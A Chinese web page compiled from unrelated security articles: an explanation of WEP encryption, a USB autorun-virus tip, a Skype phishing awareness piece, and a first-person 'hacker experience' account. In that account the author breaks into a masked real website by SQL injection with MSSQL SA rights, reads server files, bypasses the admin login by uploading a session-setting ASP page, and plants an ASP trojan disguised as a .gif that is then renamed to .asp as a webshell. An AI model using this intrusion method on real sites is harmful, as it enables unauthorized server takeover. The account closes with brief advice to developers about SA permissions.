  相对于有线网络来说,通过无线局域网发送和接收数据更容易被窃听。设计一个完善的无线局域网系统,加密和认证是需要考虑的两个必不可少的安全因素。无线局域网中应用加密和认证技术的最根本目的就是使无线业务能够达到与有线业务同样的安全等级。针对这个目标,IEEE802.11标准中采用了WEP(Wired Equivalent Privacy:有线对等保密)协议来设置专门的安全机制,进行业务流的加密和节点的认证。它主要用于无线局域网中链路层信息数据的保密。WEP采用对称加密机理,数据的加密和解密采用相同的密钥和加密算法。WEP 使用加密密钥(也称为 WEP 密钥)加密 802.11 网络上交换的每个数据包的数据部分。启用加密后,两个 802.11 设备要进行通信,必须具有相同的加密密钥,并且均配置为使用加密。如果配置一个设备使用加密而另一个设备没有,则即使两个设备具有相同的加密密钥也无法通信。(如图一所示)
图一:WEP加密
  WEP加密过程
  WEP支持 64 位和128 位加密,对于 64 位加密,加密密钥为 10 个十六进制字符(0-9 和 A-F)或 5 个 ASCII 字符;对于 128 位加密,加密密钥为 26 个十六进制字符或 13 个 ASCII 字符。64 位加密有时称为 40 位加密;128 位加密有时称为 104 位加密。152 位加密不是标准 WEP 技术,没有受到客户端设备的广泛支持。WEP依赖通信双方共享的密钥来保护所传的加密数据帧。其数据的加密过程如下。
  1、计算校验和(Check Summing)。
  (1)对输入数据进行完整性校验和计算。
  (2)把输入数据和计算得到的校验和组合起来得到新的加密数据,也称之为明文,明文作为下一步加密过程的输入。
  2、加密。在这个过程中,将第一步得到的数据明文采用算法加密。对明文的加密有两层含义:明文数据的加密,保护未经认证的数据。
  (1)将24位的初始化向量和40位的密钥连接进行校验和计算,得到64位的数据。
  (2)将这个64位的数据输入到虚拟随机数产生器中,它对初始化向量和密钥的校验和计算值进行加密计算。
  (3)经过校验和计算的明文与虚拟随机数产生器的输出密钥流进行按位异或运算得到加密后的信息,即密文。
  3、传输。将初始化向量和密文串接起来,得到要传输的加密数据帧,在无线链路上传输。(如图二所示)
图二:WEP加密过程
  WEP解密过程
  在安全机制中,加密数据帧的解密过程只是加密过程的简单取反。解密过程如下。
  1、恢复初始明文。重新产生密钥流,将其与接收到的密文信息进行异或运算,以恢复初始明文信息。
  2、检验校验和。接收方根据恢复的明文信息来检验校验和,将恢复的明文信息分离,重新计算校验和并检查它是否与接收到的校验和相匹配。这样可以保证只有正确校验和的数据帧才会被接收方接受。
图三:WEP解密过程
  阅读关于 无线安全 破解 加密 的全部文章
让你U盘永远不中毒
最近看到好多朋友的U盘都有毒,个人有个绝好的方法让你的U盘永远不中毒。希望对大家有好处。方法如下:在你的U盘中建个文件夹,命名为autorun.inf,里面什么都不放。如果你的U盘无法完成重命名,这说明你的U盘已中毒,这时,个人建议你先备份重要文件,再格式化。
原理是:大多数病毒是先建立autorun.inf再键入内容,病毒在进入C盘时就是通过这个文件夹里内部文件来为媒介的,如果事先建一个空的文件夹,大家都知道,一个盘里面不能同时有两个文件名一样。
轻轻松松防U盘病毒!
这个方法只能防止自动运行类的病毒,对文件隐藏和其他类型的u盘病毒则没有效果。(来源: )
黑客经验谈 MSSQLSA权限入侵的感悟
想必大家都知道MSSQL中SA权限是什么,可以说是至高无上。今天我就它的危害再谈点儿,我所讲的是配合NBSI上传功能得到WebShell。在讲之前先说几个条件,否则得到Shell是有难度的。  1.存在SQL注入,并且数据库类型是MSSQL。  2.连接数据库的权限必须是SA。  3.后台必须有文件上传的程序。  好了,我们找到一个网址hxxp://www.******.com/fangchan/listpro.asp?id=53,用NBSI一会就一目了然了。  很好,数据库类型是MSSQL,权限是SA,再看看第三个条件满足不满足。找到页面中的文章(新闻),看看里面的图片的地址是什么。好!一看就明白了hxxp:///admin/uploadpic/2xx4329.gif,你明白了吗?特别是2xx4329.gif 这下我们敢肯定后台有上传文件的功能了。下面做什么呢?晕,找出该网站所在的路径呀。这个嘛就得全靠NBSI的NB Commander(NB Tree_List)功能了(在这里我推荐大家用NB Commander,为什么呢?看完文章就知道了),不过找出网站所在的真实路径需要花一定的时间,那就看你有没有耐心了。我敢说只要有耐心,肯定能找出网站所在的真实路径。这里我找到了这个站点所在的路径D:\9x3x9,接着就是后台了,很快就得到Admin/login.asp,接下来就是账号和密码的猜解了。不过我这次猜解出现了问题。说什么也弄不出他的账号和密码,难道都是空的?我不相信,就试着登录了一下,结果失败了。于是从这开始,NB Commander功能就显得非常重要了(因为大家都知道,列目录NB Command和NB Tree_List都能实现),我找到文件conn.asp,用type D:\9x3x9\admin\logining.asp命令看了看源代码。  够狠吧!读了读代码没有问题呀!就是用的admin表字段也一样,不多说了,谁能知道其中的原因?请告诉俺一下,也让俺这只菜鸟走出困惑。进不了后台怎么上传图片呢?这里我用NBSI的上传功能,我试过了,没有成功。因为我传上去后,看到代码每行都重复三次,也不知是为什么,就是用臭要饭的Getwebshell也是同样的结果。  我想有了,看看它的Session是怎么验证的,又是一个type D:\9x3x9\admin\quanxian.asp。通过分析很快就明白了,它给Session(&wsl&)赋了一个值为1,哈哈!我写了一个非常简单的程序。用NBSI的上传功能传了上去,我想不管重复几次都是正确的(这里你又会想到什么呢?如果密码是MD5的,我们没有必要去爆破了,弄个session就ok了),传上去保存为1.asp,然后我访问hxxp://www.******.com/admin/1.asp,接着访问hxxp://www.********.com/admin/admin_index.asp,就这样进入了后台,本地测试。  小提示:Session变量和cookies是同一类型的。如果某用户将浏览器设置为不兼容任何cookie,那么该用户就无法使用这个Session变量! 当一个用户访问某页面时,每个Session变量的运行环境便自动生成,这些Session变量可在用户离开该页面后仍保留20分钟!(事实上,这些变量一直可保留至&timeout&。&timeout&的时间长短由Web服务器管理员设定。一些站点上的变量仅维持了3分钟,一些则为10分钟,还有一些则保留至默认值20分钟。)所以,如果在Session中置入了较大的对象(如ADO recordsets,connections, 等等),那就有麻烦了!随着站点访问量的增大,服务器将会因此而无法正常运行!  因为创建Session变量有很大的随意性,可随时调用,不需要开发者做精确地处理。所以,过度使用session变量将会导致代码不可读而且不好维护。  这样我找到上传图片的地方,把asp木马改成.gif传了上去,记住了上传后的名字,这里是uploadpic\2xx.gif,那么你会想到什么呢?哈哈我想起来了,把图片copy成.asp的,或者重命名成.asp的。  好了,到这里我们的马就算是上去了,至于以后的事情就不提了。  总结:SA的确给我们带来了很大危害,所以程序员在连接MSSQL数据库的时候千万不能用它,否则服务器成为肉鸡的可能性非常非常的大。还有,MSSQL 的扩展存储功能,用不到它就删除,留着就成了的利器。(来源: )
实例:揭露伪装skype的网络钓鱼骗局
近日,同事的 网络钓鱼频繁的遭到网络钓鱼的骚扰,笔者想到近期在网络上盛行的钓鱼欺骗行为,决定通过实例揭露钓鱼欺骗的本质,让我们一起对钓鱼欺骗说&不&。稍微留心的用户可能已经发现,钓鱼欺骗最近在各安全频道的暴光率一直很高,从eBay的用户数据泄密,到MSN出现的新钓鱼欺骗,以及曾经引起网银用户高度关注的伪装几大银行的钓鱼网站,这一切都在向我们预示,钓鱼欺骗已经成为网络犯罪分子用来窃取用户敏感信息的主要手段之一。  网络钓鱼起源于1996年左右,初利用电子邮件作为诱饵,盗用美国在线的帐号和密码,后来鉴于最早的黑客是用电话线作案,所以黑客们常常用Ph来取代f,就形成了今天的Phishing一词。  &网络钓鱼&攻击利用欺骗性的电子邮件和伪造的Web站点来进行诈骗活动,受骗者往往会因为钓鱼网站的诱导而泄露自己的财务数据,如信用卡号、账户用户名、口令等内容。诈骗者通常会将自己伪装成知名银行、在线零售商和信用卡公司等可信的品牌。据统计,在所有接触诈骗信息的用户中,有高达5%的人都会对这些骗局做出响应。另外最近还出现了的通过手机短信、QQ、MSN、Skype进行各种各样的&网络钓鱼&不法活动。  下面以同事在skype上收到的钓鱼欺骗为例,详细为用户讲解钓鱼欺骗的本质。钓鱼网站的页面如图1
图1  用户可能第一眼从爷面上很难区分是否为钓鱼网站,但是眼尖的用户马上可以发现其域名并不符合命名规则(图2),国内著名的tom网站怎么可能做二级页面呢?
图2  假如用户在任何时候遇到一个主流网站做了二级什么更多级页面时,我们就应该警惕,这可能就是钓鱼欺骗。这时让我们来看点击右键会发生什么状况,如图3。
(来源: )
3351人关注
3351人关注
站长在关注}

我要回帖

更多关于 苹果官网账户 的文章

更多推荐

版权声明:文章内容来源于网络,版权归原作者所有,如有侵权请点击这里与我们联系,我们将及时删除。

点击添加站长微信